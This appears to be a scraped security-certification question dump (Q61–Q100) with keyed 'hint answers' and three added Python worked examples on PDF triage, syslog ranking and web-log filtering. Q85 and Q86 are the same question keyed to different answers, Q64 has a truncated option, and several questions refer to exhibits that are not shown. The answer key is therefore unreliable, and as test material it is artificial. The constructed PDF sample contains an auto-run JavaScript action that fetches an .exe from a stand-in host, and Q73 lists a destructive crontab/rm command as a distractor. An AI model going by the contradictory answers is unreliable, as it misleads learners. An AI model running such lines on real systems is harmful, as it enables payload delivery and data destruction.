Q61.A company is experiencing a malware attack within its network. A security engineer notices many of the impacted assets are connecting outbound to a number of remote destinations and exfiltrating data. The security engineer also sees that deployed, up-to-date antivirus signatures are ineffective. Which of the following is the BEST approach to prevent any impact to the company from similar attacks in the future?
A. IDS signatures
B. Data loss prevention
C. Port security
D. Sinkholing
Hint answer: B
Q62.An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
A. SCADA
B. CAN bus
C. Modbus
D. IoT
Hint answer: B
Q63.Which of the following BEST explains the function of a managerial control?
A. To help design and implement the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To create data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Hint answer: C
Q64.A user receives a potentially malicious attachment that contains spelling errors and a PDF document. A security analyst reviews the email and decides to download the attachment to a Linux sandbox for review. Which of the following commands would MOST likely indicate if the email is malicious?
A. sha256sum ~/Desktop/file.pdf
B. file ~/Desktop/file.pdf
C. strings ~/Desktop/file.pdf | grep -i "
D. cat < ~/Desktop/file.pdf | grep -i .exe
Hint answer: C
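Added here as a worked example (it is not code from the original page): what the `strings | grep -i` triage in option C is actually looking for inside a PDF, namely the name objects that give a document active content (/JavaScript, /JS, /OpenAction, /AA, /Launch, /EmbeddedFile), alongside the `file`-style magic check (option B) and the `sha256sum` hash (option A) for reputation lookup. The PDF bytes, the indicator list and the function names are all constructed for this demo; the sample is a skeleton with an auto-run JavaScript action, not a real malware sample.

```python
"""Sandbox triage of a downloaded PDF: emulate `strings`, then look for the
name objects that mark active content. Constructed example; the sample PDF
below is a minimal skeleton, not real malware."""
import hashlib
import re
import string

# PDF name objects that give a document active content. Names are case-sensitive
# per spec, but we match case-insensitively (like `grep -i`) because obfuscated
# samples vary the casing.
PDF_INDICATORS = (
    "/JavaScript",   # script dictionary
    "/JS",           # inline script stream
    "/OpenAction",   # action run when the document opens
    "/AA",           # additional actions (page/field triggers)
    "/Launch",       # launch an external program
    "/EmbeddedFile", # attachment, often the dropped payload
)


def is_pdf(data: bytes) -> bool:
    """Roughly what `file` checks: the %PDF- magic within the first 1024 bytes."""
    return b"%PDF-" in data[:1024]


def sha256_hex(data: bytes) -> str:
    """Option A: a hash is for reputation lookup; on its own it proves nothing."""
    return hashlib.sha256(data).hexdigest()


def strings(data: bytes, min_len: int = 4):
    """Emulate `strings`: yield runs of printable ASCII at least min_len long."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    run = bytearray()
    for b in data:
        if b in printable:
            run.append(b)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run.clear()
    if len(run) >= min_len:
        yield run.decode("ascii")


def find_indicators(data: bytes) -> dict:
    """Return {indicator: count} for each indicator seen in the printable strings.
    The negative lookahead stops /JS from also counting /JSX-style names."""
    hits = {}
    for s in strings(data):
        for ind in PDF_INDICATORS:
            n = len(re.findall(re.escape(ind) + r"(?![A-Za-z])", s, flags=re.IGNORECASE))
            if n:
                hits[ind] = hits.get(ind, 0) + n
    return hits


def triage(data: bytes) -> str:
    """One-line verdict an analyst can paste into a ticket."""
    if not is_pdf(data):
        return "not a PDF (check what `file` reports it really is)"
    hits = find_indicators(data)
    if not hits:
        return "PDF with no active-content indicators"
    return "suspicious PDF: " + ", ".join(f"{k} x{v}" for k, v in sorted(hits.items()))


# Constructed sample: the catalog's /OpenAction points at a JavaScript action.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS (app.launchURL\\(\"http://example.invalid/x.exe\"\\)) >> endobj\n"
    b"\x00\x01\x02 binary filler \xff\xfe\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    print(sha256_hex(SAMPLE_PDF))
    print(triage(SAMPLE_PDF))
```

Grepping for `.exe` (option D) only catches a dropper that names its payload plainly; the /OpenAction plus /JavaScript pair above is what makes a PDF act on its own when opened, so that is the combination to look for first.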
Q65.In web application scanning, static analysis refers to scanning:
A. the system for vulnerabilities before installing the application
B. the compiled code of the application to detect possible issues.
C. an application that is installed and active on a system.
D. an application that is installed on a system that is assigned a static IP.
Hint answer: B
Q66.An organization's Chief Information Security Officer has asked department leaders to coordinate on communication plans that can be enacted in response to different cybersecurity incident triggers. Which of the following is a benefit of having these communication plans?
A. They can help to prevent the inadvertent release of damaging information outside the organization
B. They can help to limit the spread of worms by coordinating with help desk personnel earlier in the recovery phase.
C. They can quickly inform the public relations team to begin coordinating with the media as soon as a breach is detected
D. They can help to keep the organization’s senior leadership informed about the status of patching during the recovery phase
Hint answer: A
Q67.An organization prohibits users from logging in to the administrator account. If a user requires elevated permissions, the user's account should be part of an administrator group, and the user should escalate permission only as needed and on a temporary basis. The organization has the following reporting priorities when reviewing system activity:
✑ Successful administrator login: reporting priority high
✑ Failed administrator login: reporting priority medium
✑ Failed temporary elevated permissions: reporting priority low
✑ Successful temporary elevated permissions: non-reportable
A security analyst is reviewing server syslogs and sees the following:
Which of the following events is the HIGHEST reporting priority?
A. <100>2 2020-01-10T20:36:01.010Z financeserver sudo 201 32001 - BOM 'sudo vi users.txt' success
B. <100>2 2020-01-10T21:18:34.002Z adminserver sudo 201 32001 - BOM 'sudo more /etc/passwords' success
C. <100>2 2020-01-10T19:33:48.002Z webserver su 201 32001 - BOM 'su' success
D. <100>2 2020-01-10T21:53:11.002Z financeserver su 201 32001 - BOM 'su vi syslog.conf' failed for joe
Hint answer: B
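Added as a worked example (not code from the original page): a small classifier that parses the RFC 5424-style lines from the four options and applies the organization's stated reporting priorities mechanically, so the ranking comes from the header fields (which program did the escalation, and whether it succeeded) rather than from eyeballing the message text. The sample lines are the four options with the extraction residue normalised: the "-" is the empty structured-data field and the "BOM" token is the UTF-8 byte-order mark that opens the MSG part; that interpretation, and the rule that `su` means an administrator login while `sudo` means temporary elevation, are assumptions made for the example.

```python
"""Rank syslog (RFC 5424) escalation events by the stated reporting priorities.
Constructed example; the four sample lines are the question's options."""
import re
from typing import Optional

# RFC 5424 header: <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG
SYSLOG_RE = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<version>\d)\s+(?P<ts>\S+)\s+(?P<host>\S+)\s+"
    r"(?P<app>\S+)\s+(?P<procid>\S+)\s+(?P<msgid>\S+)\s+(?P<sd>\S+)\s+(?P<msg>.*)$"
)

# Reporting priorities exactly as the organization listed them, ranked for comparison.
RANK = {"high": 3, "medium": 2, "low": 1, "non-reportable": 0}


def parse(line: str) -> Optional[dict]:
    """Split one line into its header fields; None if it is not RFC 5424 shaped."""
    m = SYSLOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Drop a literal 'BOM' marker left by text extraction and normalise curly quotes.
    rec["msg"] = rec["msg"].replace("BOM ", "", 1).replace("\u2018", "'").replace("\u2019", "'")
    return rec


def classify(rec: dict) -> tuple:
    """Map (app, outcome) to (event description, reporting priority).
    Assumption: 'su' = switching to the administrator account (a login),
    'sudo' = the sanctioned temporary elevation path."""
    failed = "failed" in rec["msg"].lower()
    if rec["app"] == "su":
        if failed:
            return ("failed administrator login", "medium")
        return ("successful administrator login", "high")
    if rec["app"] == "sudo":
        if failed:
            return ("failed temporary elevated permissions", "low")
        return ("successful temporary elevated permissions", "non-reportable")
    return ("unclassified", "non-reportable")


def highest_priority(lines) -> Optional[dict]:
    """Return the parsed record with the highest reporting priority (None if nothing parses).
    Ties keep the earliest line seen."""
    best = None
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        rec["event"], rec["priority"] = classify(rec)
        if best is None or RANK[rec["priority"]] > RANK[best["priority"]]:
            best = rec
    return best


# The question's four options, quotes and dashes normalised (constructed sample).
SAMPLE_LINES = [
    "<100>2 2020-01-10T20:36:01.010Z financeserver sudo 201 32001 - BOM 'sudo vi users.txt' success",
    "<100>2 2020-01-10T21:18:34.002Z adminserver sudo 201 32001 - BOM 'sudo more /etc/passwords' success",
    "<100>2 2020-01-10T19:33:48.002Z webserver su 201 32001 - BOM 'su' success",
    "<100>2 2020-01-10T21:53:11.002Z financeserver su 201 32001 - BOM 'su vi syslog.conf' failed for joe",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = parse(line)
        print(rec["host"], rec["app"], *classify(rec))
    top = highest_priority(SAMPLE_LINES)
    print("highest:", top["host"], top["event"], top["priority"])
```

Under the stated list the classifier ranks by program and outcome only: a successful `su` is an administrator login (high) and any successful `sudo` is non-reportable regardless of which file was touched. If the organization also wants `sudo` reads of sensitive files surfaced, that needs an additional rule on the command text, which the priority list as written does not contain.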
Q68.Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?
A. Extract the hard drives from the compromised machines and then plug them into a forensics machine to apply encryption over the stored data to protect it from nonauthorized access.
B. Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
C. Perform a disk sanitization using the command #dd if=/dev/zero of=/dev/sdc bs=1M over the media that will receive a copy of the collected data.
D. Execute the command #dd if=/dev/sda of=/dev/sdc bs=512 to clone the evidence data to external media to prevent any further change.
Hint answer: B
Q69.Which of the following is the BEST way to gather patch information on a specific server?
A. Event Viewer
B. Custom script
C. SCAP software
D. CI/CD
Hint answer: C
Q70.A company employee downloads an application from the internet. After the installation, the employee begins experiencing noticeable performance issues, and files are appearing on the desktop:
Which of the following processes will the security analyst identify as the MOST likely indicator of system compromise given the processes running in Task Manager?
A. Chrome.exe
B. Word.exe
C. Explorer.exe
D. mstsc.exe
E. taskmgr.exe
Hint answer: D
Q71.Which of the following can detect vulnerable third-party libraries before code deployment?
A. Impact analysis
B. Dynamic analysis
C. Static analysis
D. Protocol analysis
Hint answer: C
Q72.A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow:
Which of the following controls must be in place to prevent this vulnerability?
A. Convert all integer numbers in strings to handle the memory buffer correctly.
B. Implement float numbers instead of integers to prevent integer overflows.
C. Use built-in functions from libraries to check and handle long numbers properly.
D. Sanitize user inputs, avoiding small numbers that cannot be handled in the memory.
Hint answer: C
Q73.A security analyst has received reports of very slow, intermittent access to a public-facing corporate server. Suspecting the system may be compromised, the analyst runs the following commands:
Based on the output from the above commands, which of the following should the analyst do NEXT to further the investigation?
A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.
B. Examine the server logs for further indicators of compromise of a web application.
C. Run kill -9 1325 to bring the load average down so the server is usable again.
D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server.
Hint answer: B
Q74.Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?
A. Trusted firmware updates provide organizations with development, compilation, remote access, and customization for embedded devices.
B. Trusted firmware updates provide organizations with security specifications, open-source libraries, and custom tools for embedded devices.
C. Trusted firmware updates provide organizations with remote code execution, distribution, maintenance, and extended warranties for embedded devices.
D. Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.
Hint answer: D
Q75.A security analyst scanned an internal company subnet and discovered a host with the following Nmap output.
Based on the output of this Nmap scan, which of the following should the analyst investigate FIRST?
A. Port 22
B. Port 135
C. Port 445
D. Port 3389
Hint answer: A
Q76.A security analyst needs to identify possible threats to a complex system a client is developing. Which of the following methodologies would BEST address this task?
A. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privileges (STRIDE)
B. Software Assurance Maturity Model (SAMM)
C. Open Web Application Security Project (OWASP)
D. Open Source Security Information Management (OSSIM)
Hint answer: A
Q77.An organization has several systems that require specific logons. Over the past few months, the security analyst has noticed numerous failed logon attempts followed by password resets. Which of the following should the analyst do to reduce the occurrence of legitimate failed logons and password resets?
A. Use SSO across all applications
B. Perform a manual privilege review
C. Adjust the current monitoring and logging rules
D. Implement multifactor authentication
Hint answer: A
Q78.A large software company wants to move its source control and deployment pipelines into a cloud-computing environment. Due to the nature of the business, management determines the recovery time objective needs to be within one hour. Which of the following strategies would put the company in the BEST position to achieve the desired recovery time?
A. Establish an alternate site with active replication to other regions
B. Configure a duplicate environment in the same region and load balance between both instances
C. Set up every cloud component with duplicated copies and auto-scaling turned on
D. Create a duplicate copy on premises that can be used for failover in a disaster situation
Hint answer: A
Q79.Which of the following incident response components can identify who is the liaison between multiple lines of business and the public?
A. Red-team analysis
B. Escalation process and procedures
C. Triage and analysis
D. Communications plan
Hint answer: D
Q80.Which of the following sources will provide the MOST relevant threat intelligence data to the security team of a dental care network?
A. H-ISAC
B. Dental forums
C. Open threat exchange
D. Dark web chatter
Hint answer: A
Q81.As part of an intelligence feed, a security analyst receives a report from a third-party trusted source. Within the report are several domains and reputational information that suggest the company’s employees may be targeted for a phishing campaign. Which of the following configuration changes would be the MOST appropriate for intelligence gathering?
A. Update the whitelist.
B. Develop a malware signature.
C. Sinkhole the domains.
D. Update the blacklist.
Hint answer: C
Q82.A security analyst is running a tool against an executable of an unknown source. The input supplied by the tool to the executable program and the output from the executable are shown below:
Which of the following should the analyst report after viewing this information?
A. A dynamic library that is needed by the executable is missing.
B. Input can be crafted to trigger an injection attack in the executable.
C. The tool caused a buffer overflow in the executable’s memory.
D. The executable attempted to execute a malicious command.
Hint answer: B
Q83.An organization recently discovered that spreadsheet files containing sensitive financial data were improperly stored on a web server. The management team wants to find out if any of these files were downloaded by public users accessing the server. The results should be written to a text file and should include the date, time, and IP address associated with any spreadsheet downloads. The web server’s log file is named webserver.log, and the report file name should be accessreport.txt. Following is a sample of the web server’s log file:
Which of the following commands should be run if an analyst only wants to include entries in which a spreadsheet was successfully downloaded?
A. more webserver.log | grep *.xls > accessreport.txt
B. more webserver.log > grep "*xls" | egrep -E 'success' > accessreport.txt
C. more webserver.log | grep -E "return=200 | xls" > accessreport.txt
D. more webserver.log | grep -A *.xls < accessreport.txt
Hint answer: C
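Added as a worked example (not code from the original page): a filter that writes only successful spreadsheet downloads, as date, time and client IP, the way the question asks. The question's own sample log is not reproduced on this page, so the log format and the lines below are constructed for the demo; the only detail carried over from option C is a `return=<status>` field and requests for `.xls` files. It also shows the caveat with option C's pattern: in `grep -E`, `|` is alternation, so `"return=200 | xls"` matches any line containing either term, whereas the function below requires a successful GET and a spreadsheet extension on the same line.

```python
"""Report successful spreadsheet downloads from a web server log as
'date time ip'. Constructed example with a constructed log format."""
import re
from typing import Iterable, List

# Constructed log format: DATE TIME src=IP method=VERB file=PATH return=STATUS
LOG_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"src=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+method=(?P<method>\S+)\s+"
    r"file=(?P<file>\S+)\s+return=(?P<status>\d{3})\b"
)
# Anchor on the extension so '/docs/xls-howto.html' is not counted as a spreadsheet.
SPREADSHEET_EXT = re.compile(r"\.xlsx?$", re.IGNORECASE)


def spreadsheet_downloads(lines: Iterable[str]) -> List[str]:
    """Return 'date time ip' for every GET of a spreadsheet that returned 200.
    All three conditions must hold on one line; a HEAD or a 404 is not a download."""
    report = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        path = m.group("file").split("?", 1)[0]  # ignore any query string
        if (m.group("method") == "GET"
                and m.group("status") == "200"
                and SPREADSHEET_EXT.search(path)):
            report.append(f"{m.group('date')} {m.group('time')} {m.group('ip')}")
    return report


def write_report(lines: Iterable[str], path: str = "accessreport.txt") -> int:
    """Write the report file the question asks for; returns the number of rows."""
    rows = spreadsheet_downloads(lines)
    with open(path, "w", encoding="utf-8") as fh:
        for row in rows:
            fh.write(row + "\n")
    return len(rows)


# Constructed sample log (documentation IP ranges; not real traffic).
SAMPLE_LOG = [
    "2020-01-14 09:58:03 src=203.0.113.7 method=GET file=/index.html return=200",
    "2020-01-14 10:15:22 src=203.0.113.7 method=GET file=/finance/q4-forecast.xls return=200",
    "2020-01-14 10:16:40 src=198.51.100.23 method=GET file=/finance/payroll.xlsx?dl=1 return=200",
    "2020-01-14 10:17:05 src=198.51.100.23 method=GET file=/finance/budget.xls return=404",
    "2020-01-14 10:18:11 src=192.0.2.44 method=HEAD file=/finance/budget.xls return=200",
    "2020-01-14 10:19:30 src=192.0.2.44 method=GET file=/docs/xls-howto.html return=200",
    "this line is corrupt and should be skipped",
]

if __name__ == "__main__":
    for row in spreadsheet_downloads(SAMPLE_LOG):
        print(row)
```

Of the seven sample lines only the two completed GETs of `.xls`/`.xlsx` files are reported; the 404, the HEAD request and the HTML page whose name merely contains "xls" would all have slipped through a bare `grep xls`.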
Q84.A software development team asked a security analyst to review some code for security vulnerabilities. Which of the following would BEST assist the security analyst while performing this task?
A. Static analysis
B. Dynamic analysis
C. Regression testing
D. User acceptance testing
Hint answer: A
Q85.After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of
JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.
Hint answer: C
Q86.After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of
JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
A. Make a backup of the server and update the JBoss server that is running on it.
B. Contact the vendor for the legacy application and request an updated version.
C. Create a proper DMZ for outdated components and segregate the JBoss server.
D. Apply virtualization over the server, using the new platform to provide the JBoss service for the legacy application as an external service.
Hint answer: B
Q87.The management team assigned the following values to an inadvertent breach of privacy regulations during the original risk assessment:
✑ Probability = 25%
✑ Magnitude = $1,015 per record
✑ Total records = 10,000
Two breaches occurred during the fiscal year. The first compromised 35 records, and the second compromised 65 records. Which of the following is the value of the records that were compromised?
A. $10,150
B. $25,375
C. $101,500
D. $2,537,500
Hint answer: C
Q88.Which of the following is a difference between SOAR and SCAP?
A. SOAR can be executed faster and with fewer false positives than SCAP because of advanced heuristics.
B. SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
C. SOAR is less expensive because process and vulnerability remediation is more automated than what SCAP does.
D. SOAR eliminates the need for people to perform remediation, while SCAP relies heavily on security analysts.
Hint answer: B
Q89.A general contractor has a list of contract documents containing critical business data that are stored at a public cloud provider. The organization’s security analyst recently reviewed some of the storage containers and discovered most of the containers are not encrypted. Which of the following configurations will provide the MOST security to resolve the vulnerability?
A. Upgrading TLS 1.2 connections to TLS 1.3
B. Implementing AES-256 encryption on the containers
C. Enabling SHA-256 hashing on the containers
D. Implementing the Triple Data Encryption Algorithm at the file level
Hint answer: B
Q90.A network attack that is exploiting a vulnerability in the SNMP is detected. Which of the following should the cybersecurity analyst do FIRST?
A. Apply the required patches to remediate the vulnerability
B. Escalate the incident to the senior management team for guidance
C. Disable all privileged user accounts on the network
D. Temporarily block the attacking IP address
Hint answer: D
Q91.A new variant of malware is spreading on the company network using TCP/443 to contact its command-and-control server. The domain name used for callback continues to change, and the analyst is unable to predict future domain name variance. Which of the following actions should the analyst take to stop malicious communications with the LEAST disruption to service?
A. Implement a sinkhole with a high entropy level.
B. Disable TCP/53 at the perimeter firewall.
C. Block TCP/443 at the edge router.
D. Configure the DNS forwarders to use recursion.
Hint answer: A
Q92.A developer wrote a script to make names and other PII data unidentifiable before loading a database export into the testing system. Which of the following describes the type of control that is being used?
A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification
Hint answer: B
Q93.A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities. The type of vulnerability that should be disseminated FIRST is one that:
A. enables remote code execution that is being exploited in the wild.
B. enables data leakage but is not known to be in the environment.
C. enables lateral movement and was reported as a proof of concept.
D. affected the organization in the past but was probably contained and eradicated.
Hint answer: A
Q94.An organization discovers motherboards within the environment that appear to have been physically altered during the manufacturing process. Which of the following is the BEST course of action to mitigate the risk of this reoccurring?
A. Perform an assessment of the firmware to determine any malicious modifications.
B. Conduct a trade study to determine if the additional risk constitutes further action.
C. Coordinate a supply chain assessment to ensure hardware authenticity
D. Work with IT to replace the devices with the known-altered motherboards.
Hint answer: C
Q95.Which of the following BEST describes HSM?
A. A computing device that manages cryptography, decrypts traffic, and maintains library calls
B. A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
C. A computing device that manages physical keys, encrypts devices, and creates strong cryptographic functions
D. A computing device that manages algorithms, performs entropy functions, and maintains digital signatures
Hint answer: B
Q96.A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability scan for a long period of time. The vulnerabilities are on systems that are dedicated to the firm's largest client. Which of the following is MOST likely inhibiting the remediation efforts?
A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime
Hint answer: D
Q97.Which of the following solutions is the BEST method to prevent unauthorized use of an API?
A. HTTPS
B. Geofencing
C. Rate limiting
D. Authentication
Hint answer: D
Q98.A security analyst working in the SOC recently discovered instances in which hosts visited a specific set of domains and IPs and became infected with malware. Which of the following is the MOST appropriate action to take in this situation?
A. Implement an IPS signature for the malware and update the deny list for the associated domains and IPs
B. Implement an IPS signature for the malware and another signature request to block all the associated domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow traffic to and from the origin IPs' subnets and second-level domains
Hint answer: A
Q99.A security analyst is researching ways to improve the security of a company's email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. An AAAA record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Hint answer: C
Q100.Which of the following techniques can be implemented to safeguard the confidentiality of sensitive information while allowing limited access to authorized individuals?
A. Deidentification
B. Hashing
C. Masking
D. Salting
Hint answer: C